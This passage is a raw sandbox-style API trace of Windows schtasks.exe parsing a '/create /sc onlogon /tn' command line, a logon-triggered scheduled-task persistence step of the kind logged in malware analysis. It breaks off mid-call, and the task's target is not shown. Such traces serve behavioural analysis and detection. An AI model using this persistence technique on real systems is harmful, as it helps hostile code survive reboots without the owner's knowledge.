[0028.291] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365498) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365498) returned 0x14 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365498 | out: hHeap=0x350000) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x366a48) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x366a48) returned 0x44 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366a48 | out: hHeap=0x350000) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3654b8) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3654b8) returned 0x14 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3654b8 | out: hHeap=0x350000) returned 1 [0028.292] GetProcessHeap () returned 0x350000 [0028.292] GetProcessHeap () returned 0x350000 [0028.292] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364c28) returned 1 [0028.292] GetProcessHeap () returned 0x350000 [0028.292] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364c28) returned 0x10 [0028.292] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364c28 | out: hHeap=0x350000) returned 1 [0028.292] SetLastError (dwErrCode=0x0) [0028.292] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0028.292] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0028.292] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0028.292] VerifyVersionInfoW (in: lpVersionInformation=0x16c7b8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x16c7b8) returned 1 [0028.292] SetLastError (dwErrCode=0x0) [0028.292] lstrlenW (lpString="create") returned 6 [0028.292] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0028.292] SetLastError (dwErrCode=0x490) [0028.292] SetLastError (dwErrCode=0x0) [0028.292] lstrlenW (lpString="create") returned 6 [0028.292] GetProcessHeap () returned 0x350000 [0028.292] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3654b8 [0028.292] GetProcessHeap () returned 0x350000 [0028.292] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364c28 [0028.292] _memicmp (_Buf1=0x364c28, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.292] GetProcessHeap () returned 0x350000 [0028.292] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x16) returned 0x365498 [0028.292] SetLastError (dwErrCode=0x0) [0028.292] _memicmp (_Buf1=0x364ca0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.292] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x365ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0028.293] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0028.293] GetProcessHeap () returned 0x350000 [0028.293] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x74e) returned 0x365cf0 [0028.293] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x365cf0 | out: lpData=0x365cf0) returned 1 [0028.293] VerQueryValueW (in: pBlock=0x365cf0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16c8c0, puLen=0x16c8c4 | out: lplpBuffer=0x16c8c0*=0x36608c, puLen=0x16c8c4) returned 1 [0028.293] _memicmp (_Buf1=0x364ca0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.293] _vsnwprintf (in: _Buffer=0x365ae0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x16c8a8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0028.293] VerQueryValueW (in: pBlock=0x365cf0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x16c8d0, puLen=0x16c8cc | out: lplpBuffer=0x16c8d0*=0x365eb8, puLen=0x16c8cc) returned 1 [0028.293] lstrlenW (lpString="schtasks.exe") returned 12 [0028.293] lstrlenW (lpString="schtasks.exe") returned 12 [0028.293] lstrlenW (lpString=".EXE") returned 4 [0028.293] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0028.293] lstrlenW (lpString="schtasks.exe") returned 12 [0028.293] lstrlenW (lpString=".EXE") returned 4 [0028.293] lstrlenW (lpString="schtasks") returned 8 [0028.293] lstrlenW (lpString="/create") returned 7 [0028.293] _memicmp (_Buf1=0x364ca0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.293] _vsnwprintf (in: _Buffer=0x365ae0, _BufferCount=0x19, _Format="%s %s", _ArgList=0x16c8a8 | out: _Buffer="schtasks /create") returned 16 [0028.293] _memicmp (_Buf1=0x364d00, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.293] GetProcessHeap () returned 0x350000 [0028.293] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365478 [0028.294] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.294] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0028.294] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0028.294] GetProcessHeap () returned 0x350000 [0028.294] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x30) returned 0x3669b8 [0028.294] _vsnwprintf (in: _Buffer=0x3666d0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x16c8ac | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0028.294] GetProcessHeap () returned 0x350000 [0028.294] GetProcessHeap () returned 0x350000 [0028.294] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365cf0) returned 1 [0028.294] GetProcessHeap () returned 0x350000 [0028.294] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365cf0) returned 0x74e [0028.294] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365cf0 | out: hHeap=0x350000) returned 1 [0028.294] SetLastError (dwErrCode=0x0) [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="create") returned 6 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="?") returned 1 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="s") returned 1 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="u") returned 1 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="p") returned 1 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="ru") returned 2 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="rp") returned 2 [0028.294] GetThreadLocale () returned 0x409 [0028.294] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.294] lstrlenW (lpString="sc") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="mo") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="d") returned 1 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="m") returned 1 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="i") returned 1 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="tn") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="tr") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="st") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="sd") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="ed") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="it") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="et") returned 2 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.295] lstrlenW (lpString="k") returned 1 [0028.295] GetThreadLocale () returned 0x409 [0028.295] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="du") returned 2 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="ri") returned 2 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="z") returned 1 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="f") returned 1 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="v1") returned 2 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="xml") returned 3 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="ec") returned 2 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="rl") returned 2 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="delay") returned 5 [0028.296] GetThreadLocale () returned 0x409 [0028.296] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.296] lstrlenW (lpString="np") returned 2 [0028.296] SetLastError (dwErrCode=0x0) [0028.296] SetLastError (dwErrCode=0x0) [0028.296] lstrlenW (lpString="/create") returned 7 [0028.296] lstrlenW (lpString="-/") returned 2 [0028.296] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.296] lstrlenW (lpString="create") returned 6 [0028.296] lstrlenW (lpString="create") returned 6 [0028.296] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.296] lstrlenW (lpString="create") returned 6 [0028.296] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.297] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|create|") returned 8 [0028.297] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|create|") returned 8 [0028.297] lstrlenW (lpString="|create|") returned 8 [0028.297] lstrlenW (lpString="|create|") returned 8 [0028.297] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0028.297] SetLastError (dwErrCode=0x0) [0028.297] SetLastError (dwErrCode=0x0) [0028.297] SetLastError (dwErrCode=0x0) [0028.297] lstrlenW (lpString="/sc") returned 3 [0028.297] lstrlenW (lpString="-/") returned 2 [0028.297] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.297] lstrlenW (lpString="create") returned 6 [0028.297] lstrlenW (lpString="create") returned 6 [0028.297] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.297] lstrlenW (lpString="sc") returned 2 [0028.297] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.297] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|create|") returned 8 [0028.297] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.297] lstrlenW (lpString="|create|") returned 8 [0028.297] lstrlenW (lpString="|sc|") returned 4 [0028.297] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0028.297] SetLastError (dwErrCode=0x490) [0028.297] lstrlenW (lpString="?") returned 1 [0028.297] lstrlenW (lpString="?") returned 1 [0028.297] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.297] lstrlenW (lpString="sc") returned 2 [0028.297] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.297] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|?|") returned 3 [0028.297] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.297] lstrlenW (lpString="|?|") returned 3 [0028.297] lstrlenW (lpString="|sc|") returned 4 [0028.297] SetLastError (dwErrCode=0x490) [0028.297] lstrlenW (lpString="s") returned 1 [0028.297] lstrlenW (lpString="s") returned 1 [0028.297] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] lstrlenW (lpString="sc") returned 2 [0028.298] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|s|") returned 3 [0028.298] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.298] lstrlenW (lpString="|s|") returned 3 [0028.298] lstrlenW (lpString="|sc|") returned 4 [0028.298] SetLastError (dwErrCode=0x490) [0028.298] lstrlenW (lpString="u") returned 1 [0028.298] lstrlenW (lpString="u") returned 1 [0028.298] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] lstrlenW (lpString="sc") returned 2 [0028.298] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|u|") returned 3 [0028.298] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.298] lstrlenW (lpString="|u|") returned 3 [0028.298] lstrlenW (lpString="|sc|") returned 4 [0028.298] SetLastError (dwErrCode=0x490) [0028.298] lstrlenW (lpString="p") returned 1 [0028.298] lstrlenW (lpString="p") returned 1 [0028.298] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] lstrlenW (lpString="sc") returned 2 [0028.298] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|p|") returned 3 [0028.298] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.298] lstrlenW (lpString="|p|") returned 3 [0028.298] lstrlenW (lpString="|sc|") returned 4 [0028.298] SetLastError (dwErrCode=0x490) [0028.298] lstrlenW (lpString="ru") returned 2 [0028.298] lstrlenW (lpString="ru") returned 2 [0028.298] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] lstrlenW (lpString="sc") returned 2 [0028.298] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.298] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|ru|") returned 4 [0028.298] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.299] lstrlenW (lpString="|ru|") returned 4 [0028.299] lstrlenW (lpString="|sc|") returned 4 [0028.299] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0028.299] SetLastError (dwErrCode=0x490) [0028.299] lstrlenW (lpString="rp") returned 2 [0028.299] lstrlenW (lpString="rp") returned 2 [0028.299] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.299] lstrlenW (lpString="sc") returned 2 [0028.299] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.299] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|rp|") returned 4 [0028.299] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.299] lstrlenW (lpString="|rp|") returned 4 [0028.299] lstrlenW (lpString="|sc|") returned 4 [0028.299] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0028.299] SetLastError (dwErrCode=0x490) [0028.299] lstrlenW (lpString="sc") returned 2 [0028.299] lstrlenW (lpString="sc") returned 2 [0028.299] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.299] lstrlenW (lpString="sc") returned 2 [0028.299] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.299] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.299] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|sc|") returned 4 [0028.299] lstrlenW (lpString="|sc|") returned 4 [0028.299] lstrlenW (lpString="|sc|") returned 4 [0028.299] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0028.299] SetLastError (dwErrCode=0x0) [0028.299] SetLastError (dwErrCode=0x0) [0028.299] lstrlenW (lpString="onlogon") returned 7 [0028.299] lstrlenW (lpString="-/") returned 2 [0028.299] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0028.299] SetLastError (dwErrCode=0x490) [0028.299] SetLastError (dwErrCode=0x490) [0028.299] SetLastError (dwErrCode=0x0) [0028.299] lstrlenW (lpString="onlogon") returned 7 [0028.299] StrChrIW (lpStart="onlogon", wMatch=0x3a) returned 0x0 [0028.299] SetLastError (dwErrCode=0x490) [0028.299] SetLastError (dwErrCode=0x0) [0028.300] GetProcessHeap () returned 0x350000 [0028.300] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d78 [0028.300] _memicmp (_Buf1=0x364d78, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.300] lstrlenW (lpString="onlogon") returned 7 [0028.300] GetProcessHeap () returned 0x350000 [0028.300] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d48 [0028.300] lstrlenW (lpString="onlogon") returned 7 [0028.300] lstrlenW (lpString=" \x09") returned 2 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0028.300] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0028.300] GetLastError () returned 0x0 [0028.300] lstrlenW (lpString="onlogon") returned 7 [0028.300] lstrlenW (lpString="onlogon") returned 7 [0028.300] SetLastError (dwErrCode=0x0) [0028.300] SetLastError (dwErrCode=0x0) [0028.300] lstrlenW (lpString="/tn") returned 3 [0028.300] lstrlenW (lpString="-/") returned 2 [0028.300] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.300] lstrlenW (lpString="create") returned 6 [0028.300] lstrlenW (lpString="create") returned 6 [0028.300] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.300] lstrlenW (lpString="tn") returned 2 [0028.300] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.300] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|create|") returned 8 [0028.300] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.300] lstrlenW (lpString="|create|") returned 8 [0028.300] lstrlenW (lpString="|tn|") returned 4 [0028.300] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0028.300] SetLastError (dwErrCode=0x490) [0028.300] lstrlenW (lpString="?") returned 1 [0028.300] lstrlenW (lpString="?") returned 1 [0028.300] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] lstrlenW (lpString="tn") returned 2 [0028.301] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|?|") returned 3 [0028.301] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.301] lstrlenW (lpString="|?|") returned 3 [0028.301] lstrlenW (lpString="|tn|") returned 4 [0028.301] SetLastError (dwErrCode=0x490) [0028.301] lstrlenW (lpString="s") returned 1 [0028.301] lstrlenW (lpString="s") returned 1 [0028.301] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] lstrlenW (lpString="tn") returned 2 [0028.301] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|s|") returned 3 [0028.301] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.301] lstrlenW (lpString="|s|") returned 3 [0028.301] lstrlenW (lpString="|tn|") returned 4 [0028.301] SetLastError (dwErrCode=0x490) [0028.301] lstrlenW (lpString="u") returned 1 [0028.301] lstrlenW (lpString="u") returned 1 [0028.301] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] lstrlenW (lpString="tn") returned 2 [0028.301] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|u|") returned 3 [0028.301] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.301] lstrlenW (lpString="|u|") returned 3 [0028.301] lstrlenW (lpString="|tn|") returned 4 [0028.301] SetLastError (dwErrCode=0x490) [0028.301] lstrlenW (lpString="p") returned 1 [0028.301] lstrlenW (lpString="p") returned 1 [0028.301] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] lstrlenW (lpString="tn") returned 2 [0028.301] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.301] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|p|") returned 3 [0028.301] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16c894 | out: _Buffer="|tn|") returned 4 [0028.302] lstrlenW (lpString="|p|") returned 3 [0028.302] lstrlenW (lpString="|tn|") returned 4 [0028.302] SetLastError (dwErrCode=0x490) [0028.302] lstrlenW (lpString="ru") returned 2 [0028.302] lstrlenW (lpString="ru") returned 2 [0028.302] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.302] lstrlenW (lpString="tn") returned 2 [0028.302] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.302] _vsnwprintf (in: 